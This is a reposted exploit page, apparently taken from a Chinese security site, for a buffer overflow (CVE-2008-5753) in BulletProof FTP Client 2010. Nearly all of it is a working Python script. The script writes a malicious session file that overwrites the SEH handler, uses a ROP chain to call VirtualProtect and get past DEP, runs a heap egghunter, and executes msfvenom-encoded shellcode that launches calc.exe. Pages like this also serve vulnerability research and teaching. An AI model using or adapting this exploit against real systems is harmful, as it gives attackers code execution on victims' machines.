BulletProof FTP Client 2010 - Buffer Overflow (DEP Bypass) Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

BulletProof FTP Client 2010 - Buffer Overflow (DEP Bypass) Exploit

来源：vfocus.net 作者：Seljan 发布时间：2015-05-20

#-----------------------------------------------------------------------------#

# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) #

# Date: Feb 15 2015                                                           #

# Exploit Author: Gabor Seljan                                                #

# Software Link: http://www.bpftp.com/ #

# Version: 2010.75.0.76                                                       #

# Tested on: Windows XP SP3 English                                           #

# Credits: His0k4                                                             #

# CVE: CVE-2008-5753                                                          #

#-----------------------------------------------------------------------------#

#!/usr/bin/python

from struct import pack

# offset to SEH is 93 byte

buf = b'A' * 13

buf += pack('<L',0x77c1f62f) # POP ECX # POP ECX # POP EDI # POP EBX # POP EBP # RETN [msvcrt.dll]

buf += b'A' * 20

buf += pack('<L',0x74c86a99) # POP ESI # RETN [oleacc.dll]

buf += b'A' * 4

buf += pack('<L',0x77c4dca8) # ADD ESP,2C # RETN [msvcrt.dll]

buf += b'A' * 18

buf += pack('<L',0x77c1c47f) # POP EBX # POP EBP # RETN 10 [msvcrt.dll]

buf += b'A' * 8

buf += pack('<L',0x74c86a9a) # RETN [oleacc.dll]

buf += b'A' * 10

buf += b'\xce\xc3\x40' # ADD ESP,400 # POP ESI # POP EBX # RETN [bpftpclient.exe]

# ROP chain

rop_gadgets = b''

rop_gadgets += pack('<L',0x77c364d5) # POP EBP # RETN [msvcrt.dll]

rop_gadgets += pack('<L',0x77c364d5) # skip 4 bytes [msvcrt.dll]

rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]

rop_gadgets += pack('<L',0xfffffafe) # Value to negate, will become 0x00000501

rop_gadgets += pack('<L',0x7ca82222) # NEG EAX # RETN [shell32.dll]

rop_gadgets += pack('<L',0x77227494) # XCHG EAX,EBX # RETN [WININET.dll]

rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]

rop_gadgets += pack('<L',0xffffffc0) # Value to negate, will become 0x00000040

rop_gadgets += pack('<L',0x771bcbe4) # NEG EAX # RETN [WININET.dll]

rop_gadgets += pack('<L',0x77f124c8) # XCHG EAX,EDX # RETN [GDI32.dll]

rop_gadgets += pack('<L',0x77c2c343) # POP ECX # RETN [msvcrt.dll]

rop_gadgets += pack('<L',0x77c605b5) # &Writable location [msvcrt.dll]

rop_gadgets += pack('<L',0x77c23b47) # POP EDI # RETN [msvcrt.dll]

rop_gadgets += pack('<L',0x77c39f92) # RETN (ROP NOP) [msvcrt.dll]

rop_gadgets += pack('<L',0x77c34d9a) # POP ESI # RETN [msvcrt.dll]

rop_gadgets += pack('<L',0x77c2aacc) # JMP [EAX] [msvcrt.dll]

rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]

rop_gadgets += pack('<L',0x77c11120) # ptr to &VirtualProtect() [IAT msvcrt.dll]

rop_gadgets += pack('<L',0x77c12df9) # PUSHAD # RETN [msvcrt.dll]

rop_gadgets += pack('<L',0x77c35524) # ptr to 'push esp # ret ' [msvcrt.dll]

# heap-only egghunter

hunter = b'\x6a\x30\x5a' # PUSH 30 # POP EDX

hunter += b'\x64\x8b\x12' # MOV EDX, DWORD PTR FS:[EDX]

hunter += b'\x80\xc2\x90' # ADD DL,90

hunter += b'\x8b\x12' # MOV EDX, DWORD PTR [EDX]

hunter += b'\xeb\x05' # JMP SHORT

hunter += b'\x66\x81\xca\xff\x0f' # OR DX,0FFF

hunter += b'\x42\x52' # INC EDX # PUSH EDX

hunter += b'\x6a\x02\x58' # PUSH 2 # POP EAX

hunter += b'\xcd\x2e' # INT 2E

hunter += b'\x3c\x05' # CMP AL,5

hunter += b'\x5a' # POP EDX

hunter += b'\x74\xef' # JE SHORT

hunter += b'\xb8\x77\x30\x30\x74' # MOV EAX, w00t

hunter += b'\x89\xd7' # MOV EDI,EDX

hunter += b'\xaf' # SCAS DWORD PTR ES:[EDI]

hunter += b'\x75\xea' # JNZ SHORT

hunter += b'\xaf' # SCAS DWORD PTR ES:[EDI]

hunter += b'\x75\xe7' # JNZ SHORT

# copy shellcode back to stack

strcpy = b'\x8b\xec' # MOV EBP,ESP

strcpy += b'\x57\x55\x55' # PUSH EDI # PUSH EBP # PUSH EBP

strcpy += b'\x68\x30\x60\xc4\x77' # PUSH ptr to &strcpy [msvcrt.dll]

strcpy += b'\xc3' # RET

egg = 'w00t'.encode()

# msfvenom -p windows/exec -b '\x00\x0d\x0a\x1a' -e x86/shikata_ga_nai cmd=calc.exe

shellcode = b''

shellcode += b'\xdb\xd1\xb8\xda\x92\x2c\xca\xd9\x74\x24\xf4\x5a\x31'

shellcode += b'\xc9\xb1\x31\x83\xc2\x04\x31\x42\x14\x03\x42\xce\x70'

shellcode += b'\xd9\x36\x06\xf6\x22\xc7\xd6\x97\xab\x22\xe7\x97\xc8'

shellcode += b'\x27\x57\x28\x9a\x6a\x5b\xc3\xce\x9e\xe8\xa1\xc6\x91'

shellcode += b'\x59\x0f\x31\x9f\x5a\x3c\x01\xbe\xd8\x3f\x56\x60\xe1'

shellcode += b'\x8f\xab\x61\x26\xed\x46\x33\xff\x79\xf4\xa4\x74\x37'

shellcode += b'\xc5\x4f\xc6\xd9\x4d\xb3\x9e\xd8\x7c\x62\x95\x82\x5e'

shellcode += b'\x84\x7a\xbf\xd6\x9e\x9f\xfa\xa1\x15\x6b\x70\x30\xfc'

shellcode += b'\xa2\x79\x9f\xc1\x0b\x88\xe1\x06\xab\x73\x94\x7e\xc8'

shellcode += b'\x0e\xaf\x44\xb3\xd4\x3a\x5f\x13\x9e\x9d\xbb\xa2\x73'

shellcode += b'\x7b\x4f\xa8\x38\x0f\x17\xac\xbf\xdc\x23\xc8\x34\xe3'

shellcode += b'\xe3\x59\x0e\xc0\x27\x02\xd4\x69\x71\xee\xbb\x96\x61'

shellcode += b'\x51\x63\x33\xe9\x7f\x70\x4e\xb0\x15\x87\xdc\xce\x5b'

shellcode += b'\x87\xde\xd0\xcb\xe0\xef\x5b\x84\x77\xf0\x89\xe1\x88'

shellcode += b'\xba\x90\x43\x01\x63\x41\xd6\x4c\x94\xbf\x14\x69\x17'

shellcode += b'\x4a\xe4\x8e\x07\x3f\xe1\xcb\x8f\xd3\x9b\x44\x7a\xd4'

shellcode += b'\x08\x64\xaf\xb7\xcf\xf6\x33\x16\x6a\x7f\xd1\x66'

identifier = b'This is a BulletProof FTP Client Session-File and should not be modified directly.'

host = buf

port = b'21'

name = b'B' + rop_gadgets + hunter + strcpy

password = b'bpfmcidchffddknejf'

local = egg + egg + shellcode

sploit = b"\r\n".join([identifier, host, port, name, password, local])

try:

print('[*] Creating exploit file...')

f = open('sploit.bps', 'wb')

f.write(sploit)

f.close()

print('[*] sploit.bps file successfully created!')

except:

print('[!] Error while creating exploit file!')

[